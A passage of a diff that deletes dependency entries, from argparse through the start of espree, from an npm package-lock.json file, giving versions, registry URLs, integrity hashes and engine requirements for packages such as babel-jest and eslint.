"sha512-KMReFUr0B4t+D+OBkjR3KYqvocp2XaSzO55UcB6mgQMd3KbcE+mWTyvVV7D/zsdEbNnV6acZUutkiHQXvTr1Rw==", - "dev": true, - "dependencies": { - "normalize-path": "^3.0.0", - "picomatch": "^2.0.4" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/argparse": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/argparse/-/argparse-2.0.1.tgz", - "integrity": "sha512-8+9WqebbFzpX9OR+Wa6O29asIogeRMzcGtAINdpMHHyAg10f05aSFVBbcEqGf/PXw1EjAZ+q2/bEBg3DvurK3Q==" - }, - "node_modules/asn1": { - "version": "0.2.6", - "resolved": "https://registry.npmjs.org/asn1/-/asn1-0.2.6.tgz", - "integrity": "sha512-ix/FxPn0MDjeyJ7i/yoHGFt/EX6LyNbxSEhPPXODPL+KB0VPk86UYfL0lMdy+KCnv+fmvIzySwaK5COwqVbWTQ==", - "dependencies": { - "safer-buffer": "~2.1.0" - } - }, - "node_modules/assert-plus": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/assert-plus/-/assert-plus-1.0.0.tgz", - "integrity": "sha512-NfJ4UzBCcQGLDlQq7nHxH+tv3kyZ0hHQqF5BO6J7tNJeP5do1llPr8dZ8zHonfhAu0PHAdMkSo+8o0wxg9lZWw==", - "engines": { - "node": ">=0.8" - } - }, - "node_modules/asynckit": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/asynckit/-/asynckit-0.4.0.tgz", - "integrity": "sha512-Oei9OH4tRh0YqU3GxhX79dM/mwVgvbZJaSNaRk+bshkj0S5cfHcgYakreBjrHwatXKbz+IoIdYLxrKim2MjW0Q==" - }, - "node_modules/aws-sign2": { - "version": "0.7.0", - "resolved": "https://registry.npmjs.org/aws-sign2/-/aws-sign2-0.7.0.tgz", - "integrity": "sha512-08kcGqnYf/YmjoRhfxyu+CLxBjUtHLXLXX/vUfx9l2LYzG3c1m61nrpyFUZI6zeS+Li/wWMMidD9KgrqtGq3mA==", - "engines": { - "node": "*" - } - }, - "node_modules/aws4": { - "version": "1.12.0", - "resolved": "https://registry.npmjs.org/aws4/-/aws4-1.12.0.tgz", - "integrity": "sha512-NmWvPnx0F1SfrQbYwOi7OeaNGokp9XhzNioJ/CSBs8Qa4vxug81mhJEAVZwxXuBmYB5KDRfMq/F3RR0BIU7sWg==" - }, - "node_modules/babel-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/babel-jest/-/babel-jest-29.7.0.tgz", - "integrity": "sha512-BrvGY3xZSwEcCzKvKsCi2GgHqDqsYkOP4/by5xCgIwGXQxIEh+8ew3gmrE1y7XRR6LHZIj6yLYnUi/mm2KXKBg==", - "dev": true, - "dependencies": { - "@jest/transform": "^29.7.0", - "@types/babel__core": "^7.1.14", - "babel-plugin-istanbul": "^6.1.1", - "babel-preset-jest": "^29.6.3", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "slash": "^3.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.8.0" - } - }, - "node_modules/babel-plugin-istanbul": { - "version": "6.1.1", - "resolved": "https://registry.npmjs.org/babel-plugin-istanbul/-/babel-plugin-istanbul-6.1.1.tgz", - "integrity": "sha512-Y1IQok9821cC9onCx5otgFfRm7Lm+I+wwxOx738M/WLPZ9Q42m4IG5W0FNX8WLL2gYMZo3JkuXIH2DOpWM+qwA==", - "dev": true, - "dependencies": { - "@babel/helper-plugin-utils": "^7.0.0", - "@istanbuljs/load-nyc-config": "^1.0.0", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-instrument": "^5.0.4", - "test-exclude": "^6.0.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-istanbul/node_modules/istanbul-lib-instrument": { - "version": "5.2.1", - "resolved": "https://registry.npmjs.org/istanbul-lib-instrument/-/istanbul-lib-instrument-5.2.1.tgz", - "integrity": "sha512-pzqtp31nLv/XFOzXGuvhCb8qhjmTVo5vjVk19XE4CRlSWz0KoeJ3bw9XsA7nOp9YBf4qHjwBxkDzKcME/J29Yg==", - "dev": true, - "dependencies": { - "@babel/core": "^7.12.3", - "@babel/parser": "^7.14.7", - "@istanbuljs/schema": "^0.1.2", - "istanbul-lib-coverage": "^3.2.0", - "semver": "^6.3.0" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/babel-plugin-jest-hoist": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-plugin-jest-hoist/-/babel-plugin-jest-hoist-29.6.3.tgz", - "integrity": "sha512-ESAc/RJvGTFEzRwOTT4+lNDk/GNHMkKbNzsvT0qKRfDyyYTskxB5rnU2njIDYVxXCBHHEI1c0YwHob3WaYujOg==", - "dev": true, - "dependencies": { - "@babel/template": "^7.3.3", - "@babel/types": "^7.3.3", - "@types/babel__core": "^7.1.14", - "@types/babel__traverse": "^7.0.6" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/babel-preset-current-node-syntax": { - "version": "1.1.0", - "resolved": "https://registry.npmjs.org/babel-preset-current-node-syntax/-/babel-preset-current-node-syntax-1.1.0.tgz", - "integrity": "sha512-ldYss8SbBlWva1bs28q78Ju5Zq1F+8BrqBZZ0VFhLBvhh6lCpC2o3gDJi/5DRLs9FgYZCnmPYIVFU4lRXCkyUw==", - "dev": true, - "dependencies": { - "@babel/plugin-syntax-async-generators": "^7.8.4", - "@babel/plugin-syntax-bigint": "^7.8.3", - "@babel/plugin-syntax-class-properties": "^7.12.13", - "@babel/plugin-syntax-class-static-block": "^7.14.5", - "@babel/plugin-syntax-import-attributes": "^7.24.7", - "@babel/plugin-syntax-import-meta": "^7.10.4", - "@babel/plugin-syntax-json-strings": "^7.8.3", - "@babel/plugin-syntax-logical-assignment-operators": "^7.10.4", - "@babel/plugin-syntax-nullish-coalescing-operator": "^7.8.3", - "@babel/plugin-syntax-numeric-separator": "^7.10.4", - "@babel/plugin-syntax-object-rest-spread": "^7.8.3", - "@babel/plugin-syntax-optional-catch-binding": "^7.8.3", - "@babel/plugin-syntax-optional-chaining": "^7.8.3", - "@babel/plugin-syntax-private-property-in-object": "^7.14.5", - "@babel/plugin-syntax-top-level-await": "^7.14.5" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/babel-preset-jest": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/babel-preset-jest/-/babel-preset-jest-29.6.3.tgz", - "integrity": "sha512-0B3bhxR6snWXJZtR/RliHTDPRgn1sNHOR0yVtq/IiQFyuOVjFS+wuio/R4gSNkyYmKmJB4wGZv2NZanmKmTnNA==", - "dev": true, - "dependencies": { - "babel-plugin-jest-hoist": "^29.6.3", - "babel-preset-current-node-syntax": "^1.0.0" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - }, - "peerDependencies": { - "@babel/core": "^7.0.0" - } - }, - "node_modules/balanced-match": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/balanced-match/-/balanced-match-1.0.2.tgz", - "integrity": "sha512-3oSeUO0TMV67hN1AmbXsK4yaqU7tjiHlbxRDZOpH0KW9+CeX4bRAaX0Anxt0tx2MrpRpWwQaPwIlISEJhYU5Pw==" - }, - "node_modules/bcrypt-pbkdf": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/bcrypt-pbkdf/-/bcrypt-pbkdf-1.0.2.tgz", - "integrity": "sha512-qeFIXtP4MSoi6NLqO12WfqARWWuCKi2Rn/9hJLEmtB5yTNr9DqFWkJRCf2qShWzPeAMRnOgCrq0sg/KLv5ES9w==", - "dependencies": { - "tweetnacl": "^0.14.3" - } - }, - "node_modules/brace-expansion": { - "version": "1.1.11", - "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.11.tgz", - "integrity": "sha512-iCuPHDFgrHX7H2vEI/5xpz07zSHB00TpugqhmYtVmMO6518mCuRMoOYFldEBl0g187ufozdaHgWKcYFb61qGiA==", - "dev": true, - "dependencies": { - "balanced-match": "^1.0.0", - "concat-map": "0.0.1" - } - }, - "node_modules/braces": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/braces/-/braces-3.0.3.tgz", - "integrity": "sha512-yQbXgO/OSZVD2IsiLlro+7Hf6Q18EJrKSEsdoMzKePKXct3gvD8oLcOQdIzGupr5Fj+EDe8gO/lxc1BzfMpxvA==", - "dev": true, - "dependencies": { - "fill-range": "^7.1.1" - }, - "engines": { - "node": ">=8" - } - }, - "node_modules/browserslist": { - "version": "4.24.2", - "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.24.2.tgz", - "integrity": "sha512-ZIc+Q62revdMcqC6aChtW4jz3My3klmCO1fEmINZY/8J3EpBg5/A/D0AKmBveUh6pgoeycoMkVMko84tuYS+Gg==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/browserslist" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ], - "dependencies": { - "caniuse-lite": "^1.0.30001669", - "electron-to-chromium": "^1.5.41", - "node-releases": "^2.0.18", - "update-browserslist-db": "^1.1.1" - }, - "bin": { - "browserslist": "cli.js" - }, - "engines": { - "node": "^6 || ^7 || ^8 || ^9 || ^10 || ^11 || ^12 || >=13.7" - } - }, - "node_modules/bser": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/bser/-/bser-2.1.1.tgz", - "integrity": "sha512-gQxTNE/GAfIIrmHLUE3oJyp5FO6HRBfhjnw4/wMmA63ZGDJnWBmgY/lyQBpnDUkGmAhbSe39tx2d/iTOAfglwQ==", - "dev": true, - "dependencies": { - "node-int64": "^0.4.0" - } - }, - "node_modules/buffer-from": { - "version": "1.1.2", - "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", - "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", - "dev": true - }, - "node_modules/byline": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/byline/-/byline-5.0.0.tgz", - "integrity": "sha512-s6webAy+R4SR8XVuJWt2V2rGvhnrhxN+9S15GNuTK3wKPOXFF6RNc+8ug2XhH+2s4f+uudG4kUVYmYOQWL2g0Q==", - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/callsites": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/callsites/-/callsites-3.1.0.tgz", - "integrity": "sha512-P8BjAsXvZS+VIDUI11hHCQEv74YT67YUi5JJFNWIqL235sBmjX4+qx9Muvls5ivyNENctx46xQLQ3aTuE7ssaQ==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/camelcase": { - "version": "5.3.1", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", - "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/caniuse-lite": { - "version": "1.0.30001680", - "resolved": "https://registry.npmjs.org/caniuse-lite/-/caniuse-lite-1.0.30001680.tgz", - "integrity": "sha512-rPQy70G6AGUMnbwS1z6Xg+RkHYPAi18ihs47GH0jcxIG7wArmPgY3XbS2sRdBbxJljp3thdT8BIqv9ccCypiPA==", - "dev": true, - "funding": [ - { - "type": "opencollective", - "url": "https://opencollective.com/browserslist" - }, - { - "type": "tidelift", - "url": "https://tidelift.com/funding/github/npm/caniuse-lite" - }, - { - "type": "github", - "url": "https://github.com/sponsors/ai" - } - ] - }, - "node_modules/caseless": { - "version": "0.12.0", - "resolved": "https://registry.npmjs.org/caseless/-/caseless-0.12.0.tgz", - "integrity": "sha512-4tYFyifaFfGacoiObjJegolkwSU4xQNGbVgUiNYVUxbQ2x2lUsFvY4hVgVzGiIe6WLOPqycWXA40l+PWsxthUw==" - }, - "node_modules/chalk": { - "version": "4.1.2", - "resolved": "https://registry.npmjs.org/chalk/-/chalk-4.1.2.tgz", - "integrity": "sha512-oKnbhFyRIXpUuez8iBMmyEa4nbj4IOQyuhc/wy9kY7/WVPcwIO9VA668Pu8RkO7+0G76SLROeyw9CpQ061i4mA==", - "dev": true, - "dependencies": { - "ansi-styles": "^4.1.0", - "supports-color": "^7.1.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/chalk/chalk?sponsor=1" - } - }, - "node_modules/char-regex": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/char-regex/-/char-regex-1.0.2.tgz", - "integrity": "sha512-kWWXztvZ5SBQV+eRgKFeh8q5sLuZY2+8WUIzlxWVTg+oGwY14qylx1KbKzHd8P6ZYkAg0xyIDU9JMHhyJMZ1jw==", - "dev": true, - "engines": { - "node": ">=10" - } - }, - "node_modules/chownr": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/chownr/-/chownr-3.0.0.tgz", - "integrity": "sha512-+IxzY9BZOQd/XuYPRmrvEVjF/nqj5kgT4kEq7VofrDoM1MxoRjEWkrCC3EtLi59TVawxTAn+orJwFQcrqEN1+g==", - "engines": { - "node": ">=18" - } - }, - "node_modules/ci-info": { - "version": "3.9.0", - "resolved": "https://registry.npmjs.org/ci-info/-/ci-info-3.9.0.tgz", - "integrity": "sha512-NIxF55hv4nSqQswkAeiOi1r83xy8JldOFDTWiug55KBu9Jnblncd2U6ViHmYgHf01TPZS77NJBhBMKdWj9HQMQ==", - "dev": true, - "funding": [ - { - "type": "github", - "url": "https://github.com/sponsors/sibiraj-s" - } - ], - "engines": { - "node": ">=8" - } - }, - "node_modules/cjs-module-lexer": { - "version": "1.4.1", - "resolved": "https://registry.npmjs.org/cjs-module-lexer/-/cjs-module-lexer-1.4.1.tgz", - "integrity": "sha512-cuSVIHi9/9E/+821Qjdvngor+xpnlwnuwIyZOaLmHBVdXL+gP+I6QQB9VkO7RI77YIcTV+S1W9AreJ5eN63JBA==", - "dev": true - }, - "node_modules/cliui": { - "version": "8.0.1", - "resolved": "https://registry.npmjs.org/cliui/-/cliui-8.0.1.tgz", - "integrity": "sha512-BSeNnyus75C4//NQ9gQt1/csTXyo/8Sb+afLAkzAptFuMsod9HFokGNudZpi/oQV73hnVK+sR+5PVRMd+Dr7YQ==", - "dev": true, - "dependencies": { - "string-width": "^4.2.0", - "strip-ansi": "^6.0.1", - "wrap-ansi": "^7.0.0" - }, - "engines": { - "node": ">=12" - } - }, - "node_modules/co": { - "version": "4.6.0", - "resolved": "https://registry.npmjs.org/co/-/co-4.6.0.tgz", - "integrity": "sha512-QVb0dM5HvG+uaxitm8wONl7jltx8dqhfU33DcqtOZcLSVIKSDDLDi7+0LbAKiyI8hD9u42m2YxXSkMGWThaecQ==", - "dev": true, - "engines": { - "iojs": ">= 1.0.0", - "node": ">= 0.12.0" - } - }, - "node_modules/collect-v8-coverage": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/collect-v8-coverage/-/collect-v8-coverage-1.0.2.tgz", - "integrity": "sha512-lHl4d5/ONEbLlJvaJNtsF/Lz+WvB07u2ycqTYbdrq7UypDXailES4valYb2eWiJFxZlVmpGekfqoxQhzyFdT4Q==", - "dev": true - }, - "node_modules/color-convert": { - "version": "2.0.1", - "resolved": "https://registry.npmjs.org/color-convert/-/color-convert-2.0.1.tgz", - "integrity": "sha512-RRECPsj7iu/xb5oKYcsFHSppFNnsj/52OVTRKb4zP5onXwVF3zVmmToNcOfGC+CRDpfK/U584fMg38ZHCaElKQ==", - "dependencies": { - "color-name": "~1.1.4" - }, - "engines": { - "node": ">=7.0.0" - } - }, - "node_modules/color-name": { - "version": "1.1.4", - "resolved": "https://registry.npmjs.org/color-name/-/color-name-1.1.4.tgz", - "integrity": "sha512-dOy+3AuW3a2wNbZHIuMZpTcgjGuLU/uBL/ubcZF9OXbDo8ff4O8yVp5Bf0efS8uEoYo5q4Fx7dY9OgQGXgAsQA==" - }, - "node_modules/combined-stream": { - "version": "1.0.8", - "resolved": "https://registry.npmjs.org/combined-stream/-/combined-stream-1.0.8.tgz", - "integrity": "sha512-FQN4MRfuJeHf7cBbBMJFXhKSDq+2kAArBlmRBvcvFE5BB1HZKXtSFASDhdlz9zOYwxh8lDdnvmMOe/+5cdoEdg==", - "dependencies": { - "delayed-stream": "~1.0.0" - }, - "engines": { - "node": ">= 0.8" - } - }, - "node_modules/concat-map": { - "version": "0.0.1", - "resolved": "https://registry.npmjs.org/concat-map/-/concat-map-0.0.1.tgz", - "integrity": "sha512-/Srv4dswyQNBfohGpz9o6Yb3Gz3SrUDqBH5rTuhGR7ahtlbYKnVxw2bCFMRljaA7EXHaXZ8wsHdodFvbkhKmqg==", - "dev": true - }, - "node_modules/convert-source-map": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/convert-source-map/-/convert-source-map-2.0.0.tgz", - "integrity": "sha512-Kvp459HrV2FEJ1CAsi1Ku+MY3kasH19TFykTz2xWmMeq6bk2NU3XXvfJ+Q61m0xktWwt+1HSYf3JZsTms3aRJg==", - "dev": true - }, - "node_modules/core-util-is": { - "version": "1.0.2", - "resolved": "https://registry.npmjs.org/core-util-is/-/core-util-is-1.0.2.tgz", - "integrity": "sha512-3lqz5YjWTYnW6dlDa5TLaTCcShfar1e40rmcJVwCBJC6mWlFuj0eCHIElmG1g5kyuJ/GD+8Wn4FFCcz4gJPfaQ==" - }, - "node_modules/cosmiconfig": { - "version": "7.1.0", - "resolved": "https://registry.npmjs.org/cosmiconfig/-/cosmiconfig-7.1.0.tgz", - "integrity": "sha512-AdmX6xUzdNASswsFtmwSt7Vj8po9IuqXm0UXz7QKPuEUmPB4XyjGfaAr2PSuELMwkRMVH1EpIkX5bTZGRB3eCA==", - "dev": true, - "dependencies": { - "@types/parse-json": "^4.0.0", - "import-fresh": "^3.2.1", - "parse-json": "^5.0.0", - "path-type": "^4.0.0", - "yaml": "^1.10.0" - }, - "engines": { - "node": ">=10" - } - }, - "node_modules/create-jest": { - "version": "29.7.0", - "resolved": "https://registry.npmjs.org/create-jest/-/create-jest-29.7.0.tgz", - "integrity": "sha512-Adz2bdH0Vq3F53KEMJOoftQFutWCukm6J24wbPWRO4k1kMY7gS7ds/uoJkNuV8wDCtWWnuwGcJwpWcih+zEW1Q==", - "dev": true, - "dependencies": { - "@jest/types": "^29.6.3", - "chalk": "^4.0.0", - "exit": "^0.1.2", - "graceful-fs": "^4.2.9", - "jest-config": "^29.7.0", - "jest-util": "^29.7.0", - "prompts": "^2.0.1" - }, - "bin": { - "create-jest": "bin/create-jest.js" - }, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/cross-spawn": { - "version": "7.0.6", - "resolved": "https://registry.npmjs.org/cross-spawn/-/cross-spawn-7.0.6.tgz", - "integrity": "sha512-uV2QOWP2nWzsy2aMp8aRibhi9dlzF5Hgh5SHaB9OiTGEyDTiJJyx0uy51QXdyWbtAHNua4XJzUKca3OzKUd3vA==", - "dependencies": { - "path-key": "^3.1.0", - "shebang-command": "^2.0.0", - "which": "^2.0.1" - }, - "engines": { - "node": ">= 8" - } - }, - "node_modules/dashdash": { - "version": "1.14.1", - "resolved": "https://registry.npmjs.org/dashdash/-/dashdash-1.14.1.tgz", - "integrity": "sha512-jRFi8UDGo6j+odZiEpjazZaWqEal3w/basFjQHQEwVtZJGDpxbH1MeYluwCS8Xq5wmLJooDlMgvVarmWfGM44g==", - "dependencies": { - "assert-plus": "^1.0.0" - }, - "engines": { - "node": ">=0.10" - } - }, - "node_modules/debug": { - "version": "4.3.4", - "resolved": "https://registry.npmjs.org/debug/-/debug-4.3.4.tgz", - "integrity": "sha512-PRWFHuSU3eDtQJPvnNY7Jcket1j0t5OuOsFzPPzsekD52Zl8qUfFIPEiswXqIvHWGVHOgX+7G/vCNNhehwxfkQ==", - "dev": true, - "dependencies": { - "ms": "2.1.2" - }, - "engines": { - "node": ">=6.0" - }, - "peerDependenciesMeta": { - "supports-color": { - "optional": true - } - } - }, - "node_modules/dedent": { - "version": "1.5.3", - "resolved": "https://registry.npmjs.org/dedent/-/dedent-1.5.3.tgz", - "integrity": "sha512-NHQtfOOW68WD8lgypbLA5oT+Bt0xXJhiYvoR6SmmNXZfpzOGXwdKWmcwG8N7PwVVWV3eF/68nmD9BaJSsTBhyQ==", - "dev": true, - "peerDependencies": { - "babel-plugin-macros": "^3.1.0" - }, - "peerDependenciesMeta": { - "babel-plugin-macros": { - "optional": true - } - } - }, - "node_modules/deep-is": { - "version": "0.1.4", - "resolved": "https://registry.npmjs.org/deep-is/-/deep-is-0.1.4.tgz", - "integrity": "sha512-oIPzksmTg4/MriiaYGO+okXDT7ztn/w3Eptv/+gSIdMdKsJo0u4CfYNFJPy+4SKMuCqGw2wxnA+URMg3t8a/bQ==", - "dev": true, - "peer": true - }, - "node_modules/deepmerge": { - "version": "4.3.1", - "resolved": "https://registry.npmjs.org/deepmerge/-/deepmerge-4.3.1.tgz", - "integrity": "sha512-3sUqbMEc77XqpdNO7FRyRog+eW3ph+GYCbj+rK+uYyRMuwsVy0rMiVtPn+QJlKFvWP/1PYpapqYn0Me2knFn+A==", - "dev": true, - "engines": { - "node": ">=0.10.0" - } - }, - "node_modules/delayed-stream": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/delayed-stream/-/delayed-stream-1.0.0.tgz", - "integrity": "sha512-ZySD7Nf91aLB0RxL4KGrKHBXl7Eds1DAmEdcoVawXnLD7SDhpNgtuII2aAkg7a7QS41jxPSZ17p4VdGnMHk3MQ==", - "engines": { - "node": ">=0.4.0" - } - }, - "node_modules/detect-newline": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/detect-newline/-/detect-newline-3.1.0.tgz", - "integrity": "sha512-TLz+x/vEXm/Y7P7wn1EJFNLxYpUD4TgMosxY6fAVJUnJMbupHBOncxyWUG9OpTaH9EBD7uFI5LfEgmMOc54DsA==", - "dev": true, - "engines": { - "node": ">=8" - } - }, - "node_modules/diff-sequences": { - "version": "29.6.3", - "resolved": "https://registry.npmjs.org/diff-sequences/-/diff-sequences-29.6.3.tgz", - "integrity": "sha512-EjePK1srD3P08o2j4f0ExnylqRs5B9tJjcp9t1krH2qRi8CCdsYfwe9JgSLurFBWwq4uOlipzfk5fHNvwFKr8Q==", - "dev": true, - "engines": { - "node": "^14.15.0 || ^16.10.0 || >=18.0.0" - } - }, - "node_modules/doctrine": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/doctrine/-/doctrine-3.0.0.tgz", - "integrity": "sha512-yS+Q5i3hBf7GBkd4KG8a7eBNNWNGLTaEwwYWUijIYM7zrlYDM0BFXHjjPWlWZ1Rg7UaddZeIDmi9jF3HmqiQ2w==", - "dev": true, - "peer": true, - "dependencies": { - "esutils": "^2.0.2" - }, - "engines": { - "node": ">=6.0.0" - } - }, - "node_modules/dot-prop": { - "version": "6.0.1", - "resolved": "https://registry.npmjs.org/dot-prop/-/dot-prop-6.0.1.tgz", - "integrity": "sha512-tE7ztYzXHIeyvc7N+hR3oi7FIbf/NIjVP9hmAt3yMXzrQ072/fpjGLx2GxNxGxUl5V73MEqYzioOMoVhGMJ5cA==", - "dev": true, - "dependencies": { - "is-obj": "^2.0.0" - }, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/eastasianwidth": { - "version": "0.2.0", - "resolved": "https://registry.npmjs.org/eastasianwidth/-/eastasianwidth-0.2.0.tgz", - "integrity": "sha512-I88TYZWc9XiYHRQ4/3c5rjjfgkjhLyW2luGIheGERbNQ6OY7yTybanSpDXZa8y7VUP9YmDcYa+eyq4ca7iLqWA==" - }, - "node_modules/ecc-jsbn": { - "version": "0.1.2", - "resolved": "https://registry.npmjs.org/ecc-jsbn/-/ecc-jsbn-0.1.2.tgz", - "integrity": "sha512-eh9O+hwRHNbG4BLTjEl3nw044CkGm5X6LoaCf7LPp7UU8Qrt47JYNi6nPX8xjW97TKGKm1ouctg0QSpZe9qrnw==", - "dependencies": { - "jsbn": "~0.1.0", - "safer-buffer": "^2.1.0" - } - }, - "node_modules/electron-to-chromium": { - "version": "1.5.63", - "resolved": "https://registry.npmjs.org/electron-to-chromium/-/electron-to-chromium-1.5.63.tgz", - "integrity": "sha512-ddeXKuY9BHo/mw145axlyWjlJ1UBt4WK3AlvkT7W2AbqfRQoacVoRUCF6wL3uIx/8wT9oLKXzI+rFqHHscByaA==", - "dev": true - }, - "node_modules/emittery": { - "version": "0.13.1", - "resolved": "https://registry.npmjs.org/emittery/-/emittery-0.13.1.tgz", - "integrity": "sha512-DeWwawk6r5yR9jFgnDKYt4sLS0LmHJJi3ZOnb5/JdbYwj3nW+FxQnHIjhBKz8YLC7oRNPVM9NQ47I3CVx34eqQ==", - "dev": true, - "engines": { - "node": ">=12" - }, - "funding": { - "url": "https://github.com/sindresorhus/emittery?sponsor=1" - } - }, - "node_modules/emoji-regex": { - "version": "8.0.0", - "resolved": "https://registry.npmjs.org/emoji-regex/-/emoji-regex-8.0.0.tgz", - "integrity": "sha512-MSjYzcWNOA0ewAHpz0MxpYFvwg6yjy1NG3xteoqz644VCo/RPgnr1/GGt+ic3iJTzQ8Eu3TdM14SawnVUmGE6A==" - }, - "node_modules/error-ex": { - "version": "1.3.2", - "resolved": "https://registry.npmjs.org/error-ex/-/error-ex-1.3.2.tgz", - "integrity": "sha512-7dFHNmqeFSEt2ZBsCriorKnn3Z2pj+fd9kmI6QoWw4//DL+icEBfc0U7qJCisqrTsKTjw4fNFy2pW9OqStD84g==", - "dev": true, - "dependencies": { - "is-arrayish": "^0.2.1" - } - }, - "node_modules/escalade": { - "version": "3.2.0", - "resolved": "https://registry.npmjs.org/escalade/-/escalade-3.2.0.tgz", - "integrity": "sha512-WUj2qlxaQtO4g6Pq5c29GTcWGDyd8itL8zTlipgECz3JesAiiOKotd8JU6otB3PACgG6xkJUyVhboMS+bje/jA==", - "dev": true, - "engines": { - "node": ">=6" - } - }, - "node_modules/escape-string-regexp": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/escape-string-regexp/-/escape-string-regexp-4.0.0.tgz", - "integrity": "sha512-TtpcNJ3XAzx3Gq8sWRzJaVajRs0uVxA2YAkdb1jm2YkPz4G6egUFAyA3n5vtEIZefPk5Wa4UXbKuS5fKkJWdgA==", - "dev": true, - "peer": true, - "engines": { - "node": ">=10" - }, - "funding": { - "url": "https://github.com/sponsors/sindresorhus" - } - }, - "node_modules/eslint": { - "version": "8.44.0", - "resolved": "https://registry.npmjs.org/eslint/-/eslint-8.44.0.tgz", - "integrity": "sha512-0wpHoUbDUHgNCyvFB5aXLiQVfK9B0at6gUvzy83k4kAsQ/u769TQDX6iKC+aO4upIHO9WSaA3QoXYQDHbNwf1A==", - "dev": true, - "peer": true, - "dependencies": { - "@eslint-community/eslint-utils": "^4.2.0", - "@eslint-community/regexpp": "^4.4.0", - "@eslint/eslintrc": "^2.1.0", - "@eslint/js": "8.44.0", - "@humanwhocodes/config-array": "^0.11.10", - "@humanwhocodes/module-importer": "^1.0.1", - "@nodelib/fs.walk": "^1.2.8", - "ajv": "^6.10.0", - "chalk": "^4.0.0", - "cross-spawn": "^7.0.2", - "debug": "^4.3.2", - "doctrine": "^3.0.0", - "escape-string-regexp": "^4.0.0", - "eslint-scope": "^7.2.0", - "eslint-visitor-keys": "^3.4.1", - "espree": "^9.6.0", - "esquery": "^1.4.2", - "esutils": "^2.0.2", - "fast-deep-equal": "^3.1.3", - "file-entry-cache": "^6.0.1", - "find-up": "^5.0.0", - "glob-parent": "^6.0.2", - "globals": "^13.19.0", - "graphemer": "^1.4.0", - "ignore": "^5.2.0", - "import-fresh": "^3.0.0", - "imurmurhash": "^0.1.4", - "is-glob": "^4.0.0", - "is-path-inside": "^3.0.3", - "js-yaml": "^4.1.0", - "json-stable-stringify-without-jsonify": "^1.0.1", - "levn": "^0.4.1", - "lodash.merge": "^4.6.2", - "minimatch": "^3.1.2", - "natural-compare": "^1.4.0", - "optionator": "^0.9.3", - "strip-ansi": "^6.0.1", - "strip-json-comments": "^3.1.0", - "text-table": "^0.2.0" - }, - "bin": { - "eslint": "bin/eslint.js" - }, - "engines": { - "node": "^12.22.0 || ^14.17.0 || >=16.0.0" - }, - "funding": { - "url": "https://opencollective.com/eslint" - } - }, - "node_modules/eslint-scope": { - "version": "7.2.0", - "resolved": "https://registry.npmjs.org/eslint-scope/-/eslint-scope-7.2.0.tgz", - "integrity": "sha512-DYj5deGlHBfMt15J7rdtyKNq/Nqlv5KfU4iodrQ019XESsRnwXH9KAE0y3cwtUHDo2ob7CypAnCqefh6vioWRw==", - "dev": true, - "peer": true, - "dependencies": { - "esrecurse": "^4.3.0", - "estraverse": "^5.2.0" - }, - "engines": { - "node": "^12.22.0 || ^14.17.0 || >=16.0.0" - }, - "funding": { - "url": "https://opencollective.com/eslint" - } - }, - "node_modules/eslint-visitor-keys": { - "version": "3.4.1", - "resolved": "https://registry.npmjs.org/eslint-visitor-keys/-/eslint-visitor-keys-3.4.1.tgz", - "integrity": "sha512-pZnmmLwYzf+kWaM/Qgrvpen51upAktaaiI01nsJD/Yr3lMOdNtq0cxkrrg16w64VtisN6okbs7Q8AfGqj4c9fA==", - "dev": true, - "peer": true, - "engines": { - "node": "^12.22.0 || ^14.17.0 || >=16.0.0" - }, - "funding": { - "url": "https://opencollective.com/eslint" - } - }, - "node_modules/espree": { - "version": "9.6.0", - 